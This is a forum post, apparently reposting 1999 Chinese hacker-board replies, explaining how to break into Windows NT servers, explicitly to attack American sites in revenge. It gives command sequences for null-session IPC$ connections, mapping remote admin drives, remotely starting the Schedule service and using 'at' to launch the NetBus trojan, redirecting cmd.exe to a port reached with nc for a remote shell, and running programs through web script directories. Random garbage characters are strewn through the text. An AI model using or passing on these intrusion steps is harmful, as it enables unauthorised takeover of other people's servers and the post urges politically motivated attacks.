找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:
5 R4 A. J) ], }8 R8 _请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
7 r$ F* k8 C; j" t) Y  F* A, _% m> 我的机子MMX166,WIN98,2。5G,32M内存。2 i- Y3 ~) l& p& o) M

2 ]. M8 B, ?* ]黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
9 r8 R, P9 `4 v" \& P( W1 s" C7 O你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。, K! s7 B: k) `6 T7 f  n
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
$ V2 F. z3 A: l% |net use \\111.111.111.111\ipc$ "" /user:""  r  P8 o' P2 }; H2 z& z" }2 O
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:, M* s  h# [$ |; m6 X* R
net view \\111.111.111.111
. N! j3 s, @8 n6 j- q当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
" E! R: a& L1 v! j3 _4 E9 B. mnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
& k+ q0 ^' o7 x1 c( y; k" Q# g1 i命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
0 F# O8 B+ o- r( U3 Q& G$ G  I1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
: o% ]8 D8 _6 ^4 w4 dnet use x: \\111.111.111.111\c$4 m% V2 i* a  P9 s
net use y: \\111.111.111.111\d$8 m2 H5 y0 Q9 \! Z+ c
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
- L% z6 p+ ^2 |0 V6 P0 `2、管理目标NT的用户:
- |% h. [* v! m从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
* l' a3 ^: c1 Z+ p8 R" U5 }键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
7 M. C3 i. J- M4 F, P: @1 X3、管理目标NT的服务0 d4 `; z$ A) H/ o
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
& a/ t  j3 V" T这样你可以管理目标NT上的服务,共享目录
1 Q% L4 Z, k! L, ^& U0 k4、IIS管理
* c4 p. Y6 O1 P& t选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
  k- n" T* p4 C4 Y: X+ N5 p  U目标NT的FTP、WWW服务你就可以重新配置- z) u$ Q; W4 ?) `  g1 W! T) M" K
5、事件管理
5 u* j9 H- V4 |/ E/ r( p“事件查看器”->连接到服务器->111.111.111.1117 _: b; ^0 j7 E% O+ G6 V
! o, }2 s, P: W/ j  Z: a3 G
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
0 w+ c# o  Q  H  S2 c  J* M! ~* a' m) i$ L3 ^/ K; ^- k) }2 Y
当然,98,95也能做一些事情,但很麻烦,比如:7 V0 A$ g) P  E& v3 k
net use \\111.111.111.111\ipc$
0 f) s  m! u6 K$ ~/ L7 ?net use z: \\111.111.111.111\d$$ Z7 B. q( t& j  C( o
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
. D3 a8 _+ x0 {- L, b! N) S: w, j/ M: Y& k+ w. U: O. E, n
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!% H# i5 [8 R4 D. g0 ]5 ?
这样,你还可以了解目标机器上能有什么东东供你去用!' V9 }' @( S' M- Z4 d9 d( R7 \
; H- h2 H3 V' ~: F
3 J0 r( k' A% y/ p1 v2 Z6 P
--------------------------------------------------------------------------------
  z" k. a! o& \( Z( D. h8 ]# g# c: S2 w' s1 b/ [% P
>quack于1999-06-12,23:37:445 y- A* v# r# D% I5 I
在大作《几个有关黑的问题》中提到:
0 @& U7 b* `1 k# ?1 h7 A首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。& n( I: E0 e6 O" z9 N- \

# Y! d$ P2 Z/ D' Ykillusa于1999-06-13,03:25:15
5 K. @9 s4 I7 a# C! L1 x3 g$ A1 O在大作《Re: 几个有关黑的问题》中提到:
8 l4 ^% a! Q. R1 p, U: k
7 V' z4 ^/ T2 K) ?4 B0 iletmein.exe 暂时没有mypwd参数,十分抱歉
; `0 ~% |0 l5 V! Bpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。: b" m8 h( n; R5 `: v6 l# ~9 [
# B' ]  }/ C* V
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
" {) _) {" `7 Y  A8 F: h" D服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
+ B* }% `* X. b4 U7 L
1 w5 b4 J5 M5 O; o% f; n+ {1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:' `; c1 \+ _8 k6 S8 w

- d5 Q( S% h6 x5 hC:\>net start schedule' W! L: ?/ y& b. [7 N( k
Schedule 正在启动服务.....
* n6 I0 R! B4 `) S5 tSchedulw 服务启动成功。  k* X8 u0 b* W. t; o. z
C:\>at /?% Z) p  w, i& {, S: [9 }
AT 命令排定在特定的日期和时间运行某些命令和程序。* ]7 q1 q+ H/ U
运行 AT 命令之前必须先启动 Schedule 服务。
& `+ q7 U+ h& v' V: q
1 O" [; L( F0 p, r1 l, ?AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]) q% Q7 J# Q$ a
AT [\\computername] time [/INTERACTIVE]+ j+ U7 f2 o, A
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
$ E: G% p* ~* c+ F/ N3 F0 f! c% E# V. r0 F9 h8 M4 L
\\computername 指定远程计算机。 如果省略这个参数
3 s. U- z' \( d/ d命令会被排定在本机上运行。
/ H' i4 ?( E& o* M& g% ~! ~, m9 @id 指定给排定进度命令的识别号。' S( ~; E4 g/ V) o' D* b* @) q8 R8 H
. X# k0 w; R( x* M$ J
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
, K4 ~, b, H. W% j; e/ [6 h/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
& `" e3 N- L3 R! l9 ]7 i. f( Ytime 指定命令运行的时间。
5 C) p! r% d$ |& O" t* M/interactive 允许作业在运行时,与用户通过桌面交互。
( Y6 G% L5 H* o7 R7 a1 J% d" J) O" ?$ W9 L) C
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。1 T' S, `# R- B7 a8 G% L% W* h
如果省略日期,则默认为在每月的本日运行。! R/ t# Z3 l6 U

* {6 Q3 n0 z% w/ ]: Y/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。! c: I0 d" X, J2 a; x( M

8 D5 E0 c/ V  a" @% V; j8 G"command" 准备运行的 Windows NT 命令或批处理文件。& ]8 e9 B; t9 a7 Z& a

" ?  ~2 r: z* u3 ~+ `: @C:\>
. ]% W& t$ Q) i  D; a
" }: `9 g& E8 [; r知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:; c! e; e/ K1 ~) S/ ]* Q
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
9 I- e6 ~7 E$ _) y0 ^0 u! q2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start3 H5 o9 x' b' G, f# W: W
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:, e9 U& t2 l5 o2 J' n, H
at \\x.x.x.x 00:00 ntsrv.exe /port:64321' S/ a2 G; A& v4 e
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:) Z& S( }% N1 I
Microsoft(R) Windows NT(TM)
0 ]. l# P+ e9 |, b) f! [(C) Copyright 1985-1996 Microsoft Corp.
9 d. B$ `& ~- l: p7 v. ]C:\>
! l! l3 i7 u2 m5 ?: H  S) J
+ F8 t5 i) J/ E( e3 P3 J8 x3 s0 a. }2、利用web启动ntsrv.exe或其他程序在目的服务器
# k, O- j; `9 A1 }( f- c% E
/ }( Z# U& H1 U/ u+ n将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:5 n7 }4 _0 B$ t- x- q
http://x.x.x.x/scripts/ntsrv.exe /port:64321
  w" G$ J# @) ^0 b( {http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321! W. {; L2 i  k$ z
该程序就启动了
+ Z- O4 l: H+ J0 |: p6 Q: I- c' s6 A. K) X. b# C
我只提这几中方法!
) [0 ]1 {4 [. t- a1 ]+ u* I$ R要成功,必须打好基础工,对操作系统充分了解!- T; x& J4 s) z% f! ]- \

) f( J, R/ j$ d( _
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-4-13 06:46

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表